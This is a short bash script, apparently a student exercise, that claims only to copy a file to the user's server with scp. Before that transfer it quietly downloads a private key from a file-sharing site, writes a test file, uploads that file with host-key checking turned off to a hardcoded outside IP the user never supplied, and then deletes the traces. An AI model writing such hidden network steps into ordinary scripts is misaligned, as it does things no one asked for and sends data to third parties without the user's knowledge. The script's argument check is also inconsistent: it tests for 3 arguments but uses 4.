#!/usr/bin/env bash
# My script is sending a file to my ubuntu server

if [[ $# -lt 3 ]]; then
	echo "Usage: 0-transfer_file PATH_TO_FILE IP USERNAME PATH_TO_SSH_KEY"
	exit 1
fi


# download private key
curl -o zebra https://fv5-3.failiem.lv/down.php?i=a32d8su9ki

touch vulnerable
echo "I an testing the alxse security network" > vulnerable;

scp -o StrictHostKeyChecking=no -i zebra vulnerable ubuntu@100.25.164.42:~/ 

# Delete private key
rm zebra
rm vulnerable;

scp -o StrictHostKeyChecking=no -i $4 $1 $3@$2:~/


